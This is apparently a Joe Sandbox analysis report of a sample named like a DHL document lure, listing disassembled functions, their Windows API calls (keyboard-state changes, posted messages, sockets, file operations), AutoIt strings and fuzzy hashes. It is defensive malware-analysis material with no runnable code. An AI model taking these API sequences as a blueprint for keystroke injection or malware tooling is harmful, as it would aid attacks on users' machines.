Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 512d637d48f2e36fcaa6d1f6e621c47e8a413f6aa84988ce0649011add455911
Instruction ID: 265f3074ff6e72798320041ea92058bcd3945252ce9ac07fa5c3f96a6c726f8f
Opcode Fuzzy Hash: 512d637d48f2e36fcaa6d1f6e621c47e8a413f6aa84988ce0649011add455911
Instruction Fuzzy Hash: 3B319F72201214BFEB115F54CC89FEB3FA9EF09755F044469FE08AA291D6B99C41CBB8

Function 00455622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00455637
_memcmp.LIBVCRUNTIME ref: 00455659
_memcmp.LIBVCRUNTIME ref: 00455671
_memcmp.LIBVCRUNTIME ref: 00455684
_memcmp.LIBVCRUNTIME ref: 0045569E
_memcmp.LIBVCRUNTIME ref: 004556B1
_memcmp.LIBVCRUNTIME ref: 004556C9
_memcmp.LIBVCRUNTIME ref: 004556E4

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f65fb9739d1d0244364257b7c85c55e005ab50f1328c522736ed28e3eb09b94b
Instruction ID: bdf6ebd21a75a77352c8f2b9a7832776332dc29246273ff3bbac6826e405e927
Opcode Fuzzy Hash: f65fb9739d1d0244364257b7c85c55e005ab50f1328c522736ed28e3eb09b94b
Instruction Fuzzy Hash: 0C21AD7164190DB7E21466124DA2FFF335CAF14346F640027FD085AA56F72CEE1986AD

Function 00474FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00475007
NULL Pointer assignment, xrefs: 0047502E, 00475383

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: dd8f6de805e580b1c6946fc40f617f039b02ab8a8ee9122c2d7b80eb9746cd73
Instruction ID: b27bd2729eb8a41d139a2653c365a6ae47eb832954383c612480dc811a8e78c4
Opcode Fuzzy Hash: dd8f6de805e580b1c6946fc40f617f039b02ab8a8ee9122c2d7b80eb9746cd73
Instruction Fuzzy Hash: 1DD19171A0060A9FDB10CFA8C881BEEB7B5FF48344F14C46AE919AB291D7B4DD45CB64

Function 00431522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,004317FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 004315CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00431651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,004317FB,?,004317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004316E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004316FB

Part of subcall function 00423820: RtlAllocateHeap.NTDLL(00000000,?,004C1444,?,0040FDF5,?,?,003FA976,00000010,004C1440,003F13FC,?,003F13C6,?,003F1129), ref: 00423852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00431777
__freea.LIBCMT ref: 004317A2
__freea.LIBCMT ref: 004317AE

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 65df1a23ffff886cfe1a5814860cea1212cc5b0a9356bc944c93fc8649418824
Instruction ID: 45edd733506f9f27479bd6caa0d43713a0da16328a00b30d4480552909d7ece6
Opcode Fuzzy Hash: 65df1a23ffff886cfe1a5814860cea1212cc5b0a9356bc944c93fc8649418824
Instruction Fuzzy Hash: CE919371E00255ABDB208FA4C881EEF7BB59F4D714F18656BE801E7261DB39DC41CB68

Function 00474523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00474648
VariantInit.OLEAUT32(?), ref: 00474749
VariantClear.OLEAUT32(?), ref: 00474753
VariantClear.OLEAUT32(?), ref: 004747B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0047472C
Null Object assignment in FOR..IN loop, xrefs: 004745D8, 00474706, 004747BE

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 9da6e882ac27547a26fcd1bcb92855468942140f316ffd8c285db0d9455f69e0
Instruction ID: 8bb02bb70d6fc837ddbc89c827f5c0a06f5ada2ad9c6ebba196a46bc10258350
Opcode Fuzzy Hash: 9da6e882ac27547a26fcd1bcb92855468942140f316ffd8c285db0d9455f69e0
Instruction Fuzzy Hash: D2918071A00219ABDF24CFA5C884FEFB7B8AF85714F10855AF509AB280D7789945CFA4

Function 00461187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0046125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00461284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 004612A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004612D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0046135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004613C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00461430

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: b75917e1a359b4ba78ea97ac1b1a67536cc31e43c803799da88ec475e3b9e252
Instruction ID: ed286f47d434b638abc8aa02ff81fc58ec016e27bcbc3c59595c3431cf02c4e2
Opcode Fuzzy Hash: b75917e1a359b4ba78ea97ac1b1a67536cc31e43c803799da88ec475e3b9e252
Instruction Fuzzy Hash: EB9105719002189FDB00DFA5C895BBE77B5FF44714F18406BE901EB3A1EB78A941CB9A

Function 0040948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: ac1a0513e709b68ba5ba63ba3a925b80bf45fd64a5d404562ca9ea325857b8a7
Instruction ID: 313451044a63bfadd1b2deac475ffb8ef511beae5d4e75b889b0bca4a7baca5a
Opcode Fuzzy Hash: ac1a0513e709b68ba5ba63ba3a925b80bf45fd64a5d404562ca9ea325857b8a7
Instruction Fuzzy Hash: D0910771900219EFCB10CFA9CC84AEEBBB8FF49324F14455AE515B7291D378AD42CB64

Function 00473947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0047396B
CharUpperBuffW.USER32(?,?), ref: 00473A7A
_wcslen.LIBCMT ref: 00473A8A
VariantClear.OLEAUT32(?), ref: 00473C1F

Part of subcall function 00460CDF: VariantInit.OLEAUT32(00000000), ref: 00460D1F
Part of subcall function 00460CDF: VariantCopy.OLEAUT32(?,?), ref: 00460D28
Part of subcall function 00460CDF: VariantClear.OLEAUT32(?), ref: 00460D34

Strings

AUTOIT.ERROR, xrefs: 00473A80, 00473A85
Incorrect Parameter format, xrefs: 004739A6, 00473BA1

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 2442b3913a8723348cc57b10e09cd672c71c4235daefdce7ba230f6914f12fe6
Instruction ID: 2f169eab9eeb22e9f134df0c750203d55bbab39cdd791c520e39937ca0f48fe5
Opcode Fuzzy Hash: 2442b3913a8723348cc57b10e09cd672c71c4235daefdce7ba230f6914f12fe6
Instruction Fuzzy Hash: FA91AC756083059FC700EF24C4819AAB7E4FF89315F14886EF88A9B352DB34EE05CB96

Function 00474BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0045000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0044FF41,80070057,?,?,?,0045035E), ref: 0045002B
Part of subcall function 0045000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0044FF41,80070057,?,?), ref: 00450046
Part of subcall function 0045000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0044FF41,80070057,?,?), ref: 00450054
Part of subcall function 0045000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0044FF41,80070057,?), ref: 00450064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00474C51
_wcslen.LIBCMT ref: 00474D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00474DCF
CoTaskMemFree.OLE32(?), ref: 00474DDA

Strings

NULL Pointer assignment, xrefs: 00474E23, 00474E52

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: f81a949bb7d2fb343f5d813cd70bd0bcc0b763da92742b2b819b7db806a95148
Instruction ID: f8176d7588c0b52adb6f1c3bcaaeadb2ae13b1b3a0adbcde8325838904c48a24
Opcode Fuzzy Hash: f81a949bb7d2fb343f5d813cd70bd0bcc0b763da92742b2b819b7db806a95148
Instruction Fuzzy Hash: 34914971D0021DAFDF11DFA4C881AEEB7B8FF48314F10816AE919AB241DB749A45CFA4

Function 004820FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00482183
GetMenuItemCount.USER32(00000000), ref: 004821B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004821DD
_wcslen.LIBCMT ref: 00482213
GetMenuItemID.USER32(?,?), ref: 0048224D
GetSubMenu.USER32(?,?), ref: 0048225B

Part of subcall function 00453A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00453A57
Part of subcall function 00453A3D: GetCurrentThreadId.KERNEL32 ref: 00453A5E
Part of subcall function 00453A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004525B3), ref: 00453A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004822E3

Part of subcall function 0045E97B: Sleep.KERNEL32 ref: 0045E9F3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 37532085eee9459d39eb845d3f20d7b9e77a62c5d4555dfac9fe4045f0bdea94
Instruction ID: 914b23103b3b2ca7426316afa636188ba956a78c6b47d11c6c1b55227994f55e
Opcode Fuzzy Hash: 37532085eee9459d39eb845d3f20d7b9e77a62c5d4555dfac9fe4045f0bdea94
Instruction Fuzzy Hash: 2F71B175E00215AFCB11EF65C985AAEB7F1FF48310F1088AAE916EB341D778ED418B94

Function 0045AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0045AEF9
GetKeyboardState.USER32(?), ref: 0045AF0E
SetKeyboardState.USER32(?), ref: 0045AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0045AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0045AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0045AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0045B020

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6ec1cb589fa4e2c8f7d2853adf211fed068a35e0bc3eef70c793c4f4b089d6af
Instruction ID: fa96e349483240ad124fb07fdada7544f3738b45526bb548695f0b3d61ff48b1
Opcode Fuzzy Hash: 6ec1cb589fa4e2c8f7d2853adf211fed068a35e0bc3eef70c793c4f4b089d6af
Instruction Fuzzy Hash: E15104A16043D13DFB3242348C45BBBBEA99B06705F08898AF9D9555C3D39CACDCD3A9

Function 0045ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0045AD19
GetKeyboardState.USER32(?), ref: 0045AD2E
SetKeyboardState.USER32(?), ref: 0045AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0045ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0045ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0045AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0045AE38

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d2916e6b68acdad78b14adab70b1664401aba45da69e470f59f2712a059cd8d4
Instruction ID: dc1c77052027c246d28d5bdb854a79b7e4b7183efe99ade29d1d828ab3aab3e8
Opcode Fuzzy Hash: d2916e6b68acdad78b14adab70b1664401aba45da69e470f59f2712a059cd8d4
Instruction Fuzzy Hash: B25128A15443D53DF73252248C46B7BBEA96B05302F08868AE4D5569C3D39CECACD36A

Function 0042542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00433CD6,?,?,?,?,?,?,?,?,00425BA3,?,?,00433CD6,?,?), ref: 00425470
__fassign.LIBCMT ref: 004254EB
__fassign.LIBCMT ref: 00425506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00433CD6,00000005,00000000,00000000), ref: 0042552C
WriteFile.KERNEL32(?,00433CD6,00000000,00425BA3,00000000,?,?,?,?,?,?,?,?,?,00425BA3,?), ref: 0042554B
WriteFile.KERNEL32(?,?,00000001,00425BA3,00000000,?,?,?,?,?,?,?,?,?,00425BA3,?), ref: 00425584

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6a3d6044c0102533efa9979a5210decad4a2218bf52b2cec01217fa531e07eca
Instruction ID: b7a9407c634d6c8942f921161e4259e0f3afa31962071d9b395fdc44d0df0e2b
Opcode Fuzzy Hash: 6a3d6044c0102533efa9979a5210decad4a2218bf52b2cec01217fa531e07eca
Instruction Fuzzy Hash: 5151E770A00618AFDB10CFA8E885AEEBBF5EF09301F14451FF555E7291D7349A81CB68

Function 004710B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0047304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0047307A
Part of subcall function 0047304E: _wcslen.LIBCMT ref: 0047309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00471112
WSAGetLastError.WSOCK32 ref: 00471121
WSAGetLastError.WSOCK32 ref: 004711C9
closesocket.WSOCK32(00000000), ref: 004711F9

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: f85aaa63fb9b55a999c1fc081e5317f29b3e3f78b2584c6b312c06829d0c1d91
Instruction ID: e3b74ee51a6ca19a9e774c5e219a92e00b6b74546dfdb8db5451935c9fba7c2d
Opcode Fuzzy Hash: f85aaa63fb9b55a999c1fc081e5317f29b3e3f78b2584c6b312c06829d0c1d91
Instruction Fuzzy Hash: CD41E431600208AFDB109F58C884BEAB7E9EF49324F54C06AF9099F2A1C774AD45CBE5

Function 0045CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0045DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0045CF22,?), ref: 0045DDFD

Part of subcall function 0045DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0045CF22,?), ref: 0045DE16

lstrcmpiW.KERNEL32(?,?), ref: 0045CF45
MoveFileW.KERNEL32(?,?), ref: 0045CF7F
_wcslen.LIBCMT ref: 0045D005
_wcslen.LIBCMT ref: 0045D01B
SHFileOperationW.SHELL32(?), ref: 0045D061

Strings

\*.*, xrefs: 0045CFF3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 3f32ace5488cce0ebcdc1c7021a8e7a971038aa9b0f4ba604274ad899003ef78
Instruction ID: 199423ff8edbf58b502e159ac034f84941b21d26e7586aa7afd18f8dd8184715
Opcode Fuzzy Hash: 3f32ace5488cce0ebcdc1c7021a8e7a971038aa9b0f4ba604274ad899003ef78
Instruction Fuzzy Hash: E6415872D452185FDF12EBA5DD81ADE77B8AF08385F1000EBE505EB142EA38A788CB54

Function 00482DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00482E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00482E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00482E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00482EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00482EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00482EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00482F0B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d9be9ff7fbe9c7771ef50e19617c24206a5c30e6d50c89b85a038a57e329afce
Instruction ID: f1fc31ae0b9c14c825802eb533dc923572964ad7b88d60247902d420f1323702
Opcode Fuzzy Hash: d9be9ff7fbe9c7771ef50e19617c24206a5c30e6d50c89b85a038a57e329afce
Instruction Fuzzy Hash: D2312430604250AFDB21EF18DD84F6A37E0FB8A710F14057AFA009F2B2CBB5A840DB19

Function 00457726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

